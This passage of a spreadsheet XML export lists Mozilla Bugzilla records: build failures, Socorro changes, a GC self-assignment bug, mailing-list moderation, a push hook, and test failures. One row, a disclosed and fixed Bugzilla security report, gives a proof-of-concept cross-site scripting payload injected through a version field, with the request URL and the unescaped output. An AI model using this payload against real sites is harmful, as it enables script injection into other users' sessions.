      <c r="M532" t="inlineStr">
        <is>
          <t>Windows Server 2003</t>
        </is>
      </c>
      <c r="N532" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O532" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P532" t="inlineStr"/>
      <c r="Q532" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R532" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S532" t="inlineStr">
        <is>
          <t>3.12.3</t>
        </is>
      </c>
      <c r="T532" t="n">
        <v>1</v>
      </c>
      <c r="U532" t="n">
        <v>0</v>
      </c>
      <c r="V532" t="n">
        <v>2</v>
      </c>
      <c r="W532" t="inlineStr">
        <is>
          <t>NSS build fails on Windows since 20090213.1 nightly build:
---
cl -FoWINNT5.2_64_OPT.OBJ/WINNT_SINGLE_SHLIB/drbg.obj -c -O2 -Zi -MD -we4002 -we4003 -we4004 -we4006 -we4009 -we4013 -we4015 -we4033 -we4035 -we4045 -we4053 -we4054 -we4063 -we4064 -we4078 -we4087 -we4098 -we4390 -we4551 -we4553 -we4715 -W3 -nologo -GT -DXP_PC -DSHLIB_SUFFIX=\"dll\" -DSHLIB_PREFIX=\"\" -DSHLIB_VERSION=\"3\" -DSOFTOKEN_SHLIB_VERSION=\"3\" -DRIJNDAEL_INCLUDE_TABLES -UDEBUG -U_DEBUG -DNDEBUG -DWIN64 -D_WINDOWS -D_AMD64_ -DWINNT -DNSS_ENABLE_ECC -DNSS_ECC_MORE_THAN_SUITE_B -DUSE_UTIL_DIRECTLY -DNSS_USE_64 -DMP_API_COMPATIBLE -I../../../../dist/WINNT5.2_64_OPT.OBJ/include  -I../../../../dist/public/nss -I../../../../dist/private/nss -Impi -Iecl  /E/security/securitytip/builds/20090213.1/nss-w2kp_WIN64/mozilla/security/nss/lib/freebl/drbg.c
drbg.c
e:/security/securitytip/builds/20090213.1/nss-w2kp_WIN64/mozilla/security/nss/lib/freebl/drbg.c(226) : warning C4267: '=' : conversion from 'size_t' to 'int', possible loss of data
e:/security/securitytip/builds/20090213.1/nss-w2kp_WIN64/mozilla/security/nss/lib/freebl/drbg.c(396) : warning C4267: '=' : conversion from 'size_t' to 'unsigned int', possible loss of data
e:/security/securitytip/builds/20090213.1/nss-w2kp_WIN64/mozilla/security/nss/lib/freebl/drbg.c(501) : warning C4018: '&gt;' : signed/unsigned mismatch
e:/security/securitytip/builds/20090213.1/nss-w2kp_WIN64/mozilla/security/nss/lib/freebl/drbg.c(504) : error C2143: syntax error : missing ';' before 'type'
e:/security/securitytip/builds/20090213.1/nss-w2kp_WIN64/mozilla/security/nss/lib/freebl/drbg.c(510) : error C2143: syntax error : missing ';' before 'type'
e:/security/securitytip/builds/20090213.1/nss-w2kp_WIN64/mozilla/security/nss/lib/freebl/drbg.c(516) : warning C4267: 'function' : conversion from 'size_t' to 'int', possible loss of data
e:/security/securitytip/builds/20090213.1/nss-w2kp_WIN64/mozilla/security/nss/lib/freebl/drbg.c(522) : warning C4267: '+=' : conversion from 'size_t' to 'PRUint32', possible loss of data
e:/security/securitytip/builds/20090213.1/nss-w2kp_WIN64/mozilla/security/nss/lib/freebl/drbg.c(546) : warning C4267: '=' : conversion from 'size_t' to 'PRUint32', possible loss of data
e:/security/securitytip/builds/20090213.1/nss-w2kp_WIN64/mozilla/security/nss/lib/freebl/drbg.c(558) : error C2061: syntax error : identifier 'prng_GenerateGlobalRandomBytes'
e:/security/securitytip/builds/20090213.1/nss-w2kp_WIN64/mozilla/security/nss/lib/freebl/drbg.c(558) : error C2059: syntax error : ';'
e:/security/securitytip/builds/20090213.1/nss-w2kp_WIN64/mozilla/security/nss/lib/freebl/drbg.c(558) : error C2059: syntax error : 'type'
e:/security/securitytip/builds/20090213.1/nss-w2kp_WIN64/mozilla/security/nss/lib/freebl/drbg.c(627) : error C4013: 'prng_GenerateGlobalRandomBytes' undefined; assuming extern returning int
make[4]: *** [WINNT5.2_64_OPT.OBJ/WINNT_SINGLE_SHLIB/drbg.obj] Error 2
make[4]: Leaving directory `/E/security/securitytip/builds/20090213.1/nss-w2kp_WIN64/mozilla/security/nss/lib/freebl'
---
Repeated for more days on machine nss-w2kp.</t>
        </is>
      </c>
      <c r="X532" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="533">
      <c r="A533" t="n">
        <v>655838</v>
      </c>
      <c r="B533" t="inlineStr">
        <is>
          <t>2011-05-09 14:29:43 -0700</t>
        </is>
      </c>
      <c r="C533" t="inlineStr">
        <is>
          <t>Change throttle rules to use ReleaseChannel</t>
        </is>
      </c>
      <c r="D533" t="inlineStr">
        <is>
          <t>2011-12-28 10:40:11 -0800</t>
        </is>
      </c>
      <c r="E533" t="n">
        <v>1</v>
      </c>
      <c r="F533" t="n">
        <v>1</v>
      </c>
      <c r="G533" t="n">
        <v>4</v>
      </c>
      <c r="H533" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I533" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J533" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K533" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L533" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M533" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N533" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O533" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P533" t="inlineStr"/>
      <c r="Q533" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R533" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S533" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T533" t="n">
        <v>1</v>
      </c>
      <c r="U533" t="n">
        <v>0</v>
      </c>
      <c r="V533" t="n">
        <v>4</v>
      </c>
      <c r="W533" t="inlineStr">
        <is>
          <t>As we discussed in IRC/email last week, we'd like to proceed with the following change to throttling.  Sheila has given the go-ahead, so we should implement ASAP.
- Any release where the ReleaseChannel is "nightly", "aurora" or "beta" should pass through at 100%
- Other existing rules should stand.
Assigning to Lars because he had a specific idea on the best way to implement this.</t>
        </is>
      </c>
      <c r="X533" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="534">
      <c r="A534" t="n">
        <v>1884457</v>
      </c>
      <c r="B534" t="inlineStr">
        <is>
          <t>2024-03-08 14:38:12 -0800</t>
        </is>
      </c>
      <c r="C534" t="inlineStr">
        <is>
          <t>Potential use of uninitialized storage on self-assignment in MarkStack::operator=()</t>
        </is>
      </c>
      <c r="D534" t="inlineStr">
        <is>
          <t>2024-09-18 19:36:58 -0700</t>
        </is>
      </c>
      <c r="E534" t="n">
        <v>1</v>
      </c>
      <c r="F534" t="n">
        <v>1</v>
      </c>
      <c r="G534" t="n">
        <v>3</v>
      </c>
      <c r="H534" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I534" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J534" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K534" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L534" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M534" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N534" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O534" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P534" t="inlineStr">
        <is>
          <t>[adv-main125+]</t>
        </is>
      </c>
      <c r="Q534" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R534" t="inlineStr">
        <is>
          <t>S4</t>
        </is>
      </c>
      <c r="S534" t="inlineStr">
        <is>
          <t>125 Branch</t>
        </is>
      </c>
      <c r="T534" t="n">
        <v>1</v>
      </c>
      <c r="U534" t="n">
        <v>0</v>
      </c>
      <c r="V534" t="n">
        <v>15</v>
      </c>
      <c r="W534" t="inlineStr">
        <is>
          <t>`MarkStack::operator=()` (`js/src/gc/Marking.cpp`) uses uninitialized storage on self-assignment:
```
    1718: MarkStack&amp; MarkStack::operator=(const MarkStack&amp; other) {
    1719:   new (this) MarkStack(other);
    1720:   return *this;
    1721: }
    ...
    1734: MarkStack&amp; MarkStack::operator=(MarkStack&amp;&amp; other) noexcept {
    1735:   new (this) MarkStack(std::move(other));
    1736:   return *this;
    1737: }
```
as the memory containing `this` is considered reused (and therefore of indeterminate content) upon return from the placement new function and before the new-initializer.
Searchfox says that these functions aren't called, but contradicts itself by saying that the move version has been hit over 5,000,000 times in coverage. I can't seem to find the code that calls it.</t>
        </is>
      </c>
      <c r="X534" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="535">
      <c r="A535" t="n">
        <v>348858</v>
      </c>
      <c r="B535" t="inlineStr">
        <is>
          <t>2006-08-16 09:00:03 -0700</t>
        </is>
      </c>
      <c r="C535" t="inlineStr">
        <is>
          <t>auto-discard messages that would be held for moderator approval, and improve the generated message</t>
        </is>
      </c>
      <c r="D535" t="inlineStr">
        <is>
          <t>2015-03-12 08:17:16 -0700</t>
        </is>
      </c>
      <c r="E535" t="n">
        <v>1</v>
      </c>
      <c r="F535" t="n">
        <v>1</v>
      </c>
      <c r="G535" t="n">
        <v>6</v>
      </c>
      <c r="H535" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I535" t="inlineStr">
        <is>
          <t>mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J535" t="inlineStr">
        <is>
          <t>Server Operations</t>
        </is>
      </c>
      <c r="K535" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L535" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M535" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N535" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O535" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P535" t="inlineStr"/>
      <c r="Q535" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R535" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S535" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T535" t="n">
        <v>1</v>
      </c>
      <c r="U535" t="n">
        <v>0</v>
      </c>
      <c r="V535" t="n">
        <v>15</v>
      </c>
      <c r="W535" t="inlineStr">
        <is>
          <t>Moderation of our mailing lists is simply not working -- it forces the moderators to wade through a vast amount of spam, and, in the exceedingly-rare case that a human has their "real" message held, it sets an unfortunate expectation that a moderator will let their message through in a reasonable time frame.
I propose the following changes be made:
1) reject all messages that would currently be held for moderation (not discard)
2) replace the rejection message with one that points to the appropriate google group and the subscription URL, as well as whatever documentation we have on using the news server
3) remove the recipient-limit from our lists (this is the only remaining case for moderated "ham" that I've seen in any meaningful quantity)
We already send out "held for moderation" messages in response to spam that makes it to mailman, so I'm not concerned about giving additional data to spammers who are "fishing" for addresses, or fallout from mail sent to forged sender addresses.
I believe these changes would improve the experience for "legitimate" users caught in our moderation trap today, as well as removing the onerous (and therefore often ignored or carelessly discharged) duty from our moderators.</t>
        </is>
      </c>
      <c r="X535" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="536">
      <c r="A536" t="n">
        <v>1607549</v>
      </c>
      <c r="B536" t="inlineStr">
        <is>
          <t>2020-01-07 12:22:02 -0800</t>
        </is>
      </c>
      <c r="C536" t="inlineStr">
        <is>
          <t>allow commit messsages that reference a non-public bug to be pushed if they are already in mozilla-central</t>
        </is>
      </c>
      <c r="D536" t="inlineStr">
        <is>
          <t>2021-01-07 12:28:27 -0800</t>
        </is>
      </c>
      <c r="E536" t="n">
        <v>1</v>
      </c>
      <c r="F536" t="n">
        <v>1</v>
      </c>
      <c r="G536" t="n">
        <v>5</v>
      </c>
      <c r="H536" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I536" t="inlineStr">
        <is>
          <t>Developer Services</t>
        </is>
      </c>
      <c r="J536" t="inlineStr">
        <is>
          <t>Mercurial: hg.mozilla.org</t>
        </is>
      </c>
      <c r="K536" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L536" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M536" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N536" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O536" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P536" t="inlineStr"/>
      <c r="Q536" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R536" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S536" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T536" t="n">
        <v>1</v>
      </c>
      <c r="U536" t="n">
        <v>0</v>
      </c>
      <c r="V536" t="n">
        <v>14</v>
      </c>
      <c r="W536" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1607003 +++
At the moment, Try pushes based on the [tip of mozilla-central](https://hg.mozilla.org/mozilla-central/rev/d5402d5ef78b2f58c9f3145451ac274b50a2b50f) get rejected by the server:
```
remote: ************************************ ERROR ************************************
remote: Your commit message references bugs that are currently private. To avoid
remote: disclosing the nature of these bugs publicly, please remove the affected bug ID
remote: from the commit message.
remote:
remote:     Affected bug: 1513586
remote:
remote: Visit https://wiki.mozilla.org/Security/Bug_Approval_Process for more
remote: information.
remote:
remote:
remote: To push this commit anyway and ignore this warning, include SKIP_BMO_CHECK
remote: in your commit message.
```
Bug 1513586 is about a push to the nss repository: https://hg.mozilla.org/projects/nss/rev/993717228da05c6bf468ac861f01b6849a94eae3
It's referenced in the commit message of https://hg.mozilla.org/mozilla-central/rev/4de1557c27c6a6fc1b0b92dc3fdb507dd9015e50
That blocks pushes based on the tip of mozilla-central and everything pushed later while the push hook is active. The hook got added in bug 1420510.
Tweaking the repository history with setting the problematic changeset's state to draft and then amending the commit message allows one to push to Try but doesn't solve the issue in general.</t>
        </is>
      </c>
      <c r="X536" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="537">
      <c r="A537" t="n">
        <v>897457</v>
      </c>
      <c r="B537" t="inlineStr">
        <is>
          <t>2013-07-24 06:08:20 -0700</t>
        </is>
      </c>
      <c r="C537" t="inlineStr">
        <is>
          <t>Modify AOL us Repack Configuration</t>
        </is>
      </c>
      <c r="D537" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:56 -0700</t>
        </is>
      </c>
      <c r="E537" t="n">
        <v>1</v>
      </c>
      <c r="F537" t="n">
        <v>1</v>
      </c>
      <c r="G537" t="n">
        <v>5</v>
      </c>
      <c r="H537" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I537" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J537" t="inlineStr">
        <is>
          <t>Release Requests</t>
        </is>
      </c>
      <c r="K537" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L537" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M537" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N537" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O537" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P537" t="inlineStr">
        <is>
          <t>[partners]</t>
        </is>
      </c>
      <c r="Q537" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R537" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S537" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T537" t="n">
        <v>1</v>
      </c>
      <c r="U537" t="n">
        <v>0</v>
      </c>
      <c r="V537" t="n">
        <v>7</v>
      </c>
      <c r="W537" t="inlineStr">
        <is>
          <t>Created attachment 780363
customfirefox_toolbar.xpi
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0 (Beta/Release)
Build ID: 20130618035212
Steps to reproduce:
Build the AOL US Edition for Firefox with an AOL xpi extension. The url to
get the xpi -
http://client.web.aol.com/toolbarfiles/Prod/downloads/aol/customfirefox/current/aol_toolbar.xpi
Expected results:
This is the AOL US toolbar for the Firefox 23 release.</t>
        </is>
      </c>
      <c r="X537" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="538">
      <c r="A538" t="n">
        <v>166448</v>
      </c>
      <c r="B538" t="inlineStr">
        <is>
          <t>2002-09-03 14:53:58 -0700</t>
        </is>
      </c>
      <c r="C538" t="inlineStr">
        <is>
          <t>Software Update Notification dialog never supposed to show, but does periodically</t>
        </is>
      </c>
      <c r="D538" t="inlineStr">
        <is>
          <t>2004-11-23 18:54:58 -0800</t>
        </is>
      </c>
      <c r="E538" t="n">
        <v>1</v>
      </c>
      <c r="F538" t="n">
        <v>1</v>
      </c>
      <c r="G538" t="n">
        <v>2</v>
      </c>
      <c r="H538" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I538" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J538" t="inlineStr">
        <is>
          <t>UI Design</t>
        </is>
      </c>
      <c r="K538" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L538" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M538" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N538" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O538" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P538" t="inlineStr"/>
      <c r="Q538" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R538" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S538" t="inlineStr">
        <is>
          <t>mozilla1.2beta</t>
        </is>
      </c>
      <c r="T538" t="n">
        <v>1</v>
      </c>
      <c r="U538" t="n">
        <v>0</v>
      </c>
      <c r="V538" t="n">
        <v>29</v>
      </c>
      <c r="W538" t="inlineStr">
        <is>
          <t>Summary:
The Software Update Notification dialog is never supposed to show up on MacOS
X. Instead it shows up every time we check for an update (~1week), reporting
that an update is available even though one is not. This symptom only affects
Netscape builds although the code is in the mozilla tree (work in progress for
mozilla).
To repro:
Just wait 7-13 days or follow a complicated and detailed set of steps that I
won't list here.
Actual results:
approx. every week a dialog will popup informing users that a browser update is
available and offering a button to click that will take them to download the
newest version(and it will).
Expected results:
Absolutely nothing. Updates should fail silently on MacOSX.
Platform info:
MacOS X specific. branch and logically the trunk. tested with 2002082305 branch
build (rtm candidate).
Original report:
&lt;http://bugscape/show_bug.cgi?id=19560&gt; by Claudius Gayle.</t>
        </is>
      </c>
      <c r="X538" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="539">
      <c r="A539" t="n">
        <v>1094573</v>
      </c>
      <c r="B539" t="inlineStr">
        <is>
          <t>2014-11-05 20:10:19 -0800</t>
        </is>
      </c>
      <c r="C539" t="inlineStr">
        <is>
          <t>[Signature report] Add a link to report/list/</t>
        </is>
      </c>
      <c r="D539" t="inlineStr">
        <is>
          <t>2014-11-19 10:51:12 -0800</t>
        </is>
      </c>
      <c r="E539" t="n">
        <v>1</v>
      </c>
      <c r="F539" t="n">
        <v>1</v>
      </c>
      <c r="G539" t="n">
        <v>4</v>
      </c>
      <c r="H539" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I539" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J539" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K539" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L539" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M539" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N539" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O539" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P539" t="inlineStr"/>
      <c r="Q539" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R539" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S539" t="inlineStr">
        <is>
          <t>111</t>
        </is>
      </c>
      <c r="T539" t="n">
        <v>1</v>
      </c>
      <c r="U539" t="n">
        <v>0</v>
      </c>
      <c r="V539" t="n">
        <v>3</v>
      </c>
      <c r="W539" t="inlineStr">
        <is>
          <t>Because the signature report page is not feature-complete yet, I expect some users will want to go to the report/list/ page in some cases. We should add a link on the signature report page to do that very simply. 
Specifically, I expect a user to: 
1. go to Super Search
2. click the "signature report" link and land on the new signature report page
3. expect something like a specific signature summary feature that hasn't been ported yet
4. be disappointed.
And I don't want users to be disappointed. :-)</t>
        </is>
      </c>
      <c r="X539" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="540">
      <c r="A540" t="n">
        <v>790296</v>
      </c>
      <c r="B540" t="inlineStr">
        <is>
          <t>2012-09-11 09:54:11 -0700</t>
        </is>
      </c>
      <c r="C540" t="inlineStr">
        <is>
          <t>[SECURITY] Field values are not escaped correctly in tabular reports</t>
        </is>
      </c>
      <c r="D540" t="inlineStr">
        <is>
          <t>2024-05-30 07:33:07 -0700</t>
        </is>
      </c>
      <c r="E540" t="n">
        <v>1</v>
      </c>
      <c r="F540" t="n">
        <v>1</v>
      </c>
      <c r="G540" t="n">
        <v>4</v>
      </c>
      <c r="H540" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I540" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J540" t="inlineStr">
        <is>
          <t>Reporting/Charting</t>
        </is>
      </c>
      <c r="K540" t="inlineStr">
        <is>
          <t>4.1.1</t>
        </is>
      </c>
      <c r="L540" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M540" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N540" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O540" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P540" t="inlineStr"/>
      <c r="Q540" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R540" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S540" t="inlineStr">
        <is>
          <t>Bugzilla 4.2</t>
        </is>
      </c>
      <c r="T540" t="n">
        <v>1</v>
      </c>
      <c r="U540" t="n">
        <v>0</v>
      </c>
      <c r="V540" t="n">
        <v>12</v>
      </c>
      <c r="W540" t="inlineStr">
        <is>
          <t>PoC:
http://localhost/cgi-bin/bug/editversions.cgi?action=add&amp;product=TestProduct -&gt;
Version: "&gt;&lt;script&gt;alert(1);&lt;/script&gt;
Add new bug to "TestProduct" with version "&gt;&lt;script&gt;alert(1);&lt;/script&gt;
http://localhost/cgi-bin/bug/query.cgi?format=report-table -&gt; 
Horizontal Axis: Version
should be the results: Version: "&gt;&lt;script&gt;alert(1);&lt;/script&gt;
-&gt; Generate Report
http://localhost/cgi-bin/bug/report.cgi?x_axis_field=version&amp;y_axis_field=&amp;z_axis_field=&amp;query_format=report-table&amp;short_desc_type=allwordssubstr&amp;short_desc=&amp;resolution=---&amp;longdesc_type=allwordssubstr&amp;longdesc=&amp;bug_file_loc_type=allwordssubstr&amp;bug_file_loc=&amp;keywords_type=allwords&amp;keywords=&amp;deadlinefrom=&amp;deadlineto=&amp;bug_id=&amp;bug_id_type=anyexact&amp;version=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&amp;emailassigned_to1=1&amp;emailtype1=substring&amp;email1=&amp;emailassigned_to2=1&amp;emailreporter2=1&amp;emailcc2=1&amp;emailtype2=substring&amp;email2=&amp;emaillongdesc3=1&amp;emailtype3=substring&amp;email3=&amp;chfieldvalue=&amp;chfieldfrom=&amp;chfieldto=Now&amp;j_top=AND&amp;f1=noop&amp;o1=noop&amp;v1=&amp;format=table&amp;action=wrap
Result:
+ oColumn.field + "&amp;amp;version="&gt;&lt;script&gt;alert(1);&lt;/script&gt;'&gt;"
 elLiner.innerHTML = "&lt;a href='buglist.cgi?action=wrap&amp;amp;resolution=---&amp;amp;version="&gt;&lt;script&gt;alert(1);&lt;/script&gt;'&gt;"
     &lt;a href="buglist.cgi?action=wrap&amp;amp;resolution=---&amp;amp;version="&gt;&lt;script&gt;alert(1);&lt;/script&gt;"&gt;5&lt;/a&gt;
&lt;a href="buglist.cgi?action=wrap&amp;amp;resolution=---&amp;amp;=%20&amp;amp;version="&gt;&lt;script&gt;alert(1);&lt;/script&gt;"&gt;5&lt;/a&gt;</t>
        </is>
      </c>
      <c r="X540" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="541">
      <c r="A541" t="n">
        <v>1620502</v>
      </c>
      <c r="B541" t="inlineStr">
        <is>
          <t>2020-03-05 18:46:26 -0800</t>
        </is>
      </c>
      <c r="C541" t="inlineStr">
        <is>
          <t>Perma taskcluster/taskgraph/test/test_try_option_syntax.py::TestTryOptionSyntax::test_apostrophe_in_message TEST-UNEXPECTED-FAIL</t>
        </is>
      </c>
      <c r="D541" t="inlineStr">
        <is>
          <t>2020-03-08 23:35:28 -0700</t>
        </is>
      </c>
      <c r="E541" t="n">
        <v>1</v>
      </c>
      <c r="F541" t="n">
        <v>1</v>
      </c>
      <c r="G541" t="n">
        <v>7</v>
      </c>
      <c r="H541" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I541" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J541" t="inlineStr">
        <is>
          <t>Task Configuration</t>
        </is>
      </c>
      <c r="K541" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L541" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M541" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N541" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O541" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P541" t="inlineStr">
        <is>
          <t>[stockwell fixed:patch]</t>
        </is>
      </c>
      <c r="Q541" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R541" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S541" t="inlineStr">
        <is>
          <t>mozilla75</t>
        </is>
      </c>
      <c r="T541" t="n">
        <v>1</v>
      </c>
      <c r="U541" t="n">
        <v>0</v>
      </c>
      <c r="V541" t="n">
        <v>6</v>
      </c>
      <c r="W541" t="inlineStr">
        <is>
          <t>**Filed by:** dvarga [at] mozilla.com
**Parsed log:** https://treeherder.mozilla.org/logviewer.html#?job_id=291906079&amp;repo=autoland
**Full log:** https://firefox-ci-tc.services.mozilla.com/api/queue/v1/task/CYq0qpahSz-Nhux7zmii1w/runs/0/artifacts/public/logs/live_backing.log
---
```
[task 2020-03-05T23:01:36.597Z]  0:32.07 /builds/worker/checkouts/gecko/taskcluster/taskgraph/test/test_try_option_syntax.py
[task 2020-03-05T23:01:36.606Z]  0:32.08 ============================= test session starts ==============================
[task 2020-03-05T23:01:36.606Z]  0:32.08 platform linux2 -- Python 2.7.17, pytest-3.6.2, py-1.5.4, pluggy-0.6.0 -- /builds/worker/checkouts/gecko/obj-x86_64-pc-linux-gnu/_virtualenvs/gecko-QUm8IANb-2/bin/python
[task 2020-03-05T23:01:36.606Z]  0:32.08 rootdir: /builds/worker/checkouts/gecko, inifile: /builds/worker/checkouts/gecko/config/mozunit/mozunit/pytest.ini
[task 2020-03-05T23:01:36.606Z]  0:32.08 collecting ... collected 42 items
[task 2020-03-05T23:01:36.606Z]  0:32.08 
[task 2020-03-05T23:01:36.607Z]  0:32.08 taskcluster/taskgraph/test/test_try_option_syntax.py::TestTryOptionSyntax::test_all_email PASSED
[task 2020-03-05T23:01:36.607Z]  0:32.08 taskcluster/taskgraph/test/test_try_option_syntax.py::TestTryOptionSyntax::test_apostrophe_in_message TEST-UNEXPECTED-FAIL
[task 2020-03-05T23:01:36.607Z]  0:32.08 taskcluster/taskgraph/test/test_try_option_syntax.py::TestTryOptionSyntax::test_artifact PASSED
[task 2020-03-05T23:01:36.607Z]  0:32.08 taskcluster/taskgraph/test/test_try_option_syntax.py::TestTryOptionSyntax::test_b_d TEST-UNEXPECTED-FAIL
[task 2020-03-05T23:01:36.607Z]  0:32.08 taskcluster/taskgraph/test/test_try_option_syntax.py::TestTryOptionSyntax::test_b_do TEST-UNEXPECTED-FAIL
[task 2020-03-05T23:01:36.607Z]  0:32.08 taskcluster/taskgraph/test/test_try_option_syntax.py::TestTryOptionSyntax::test_b_dx TEST-UNEXPECTED-FAIL
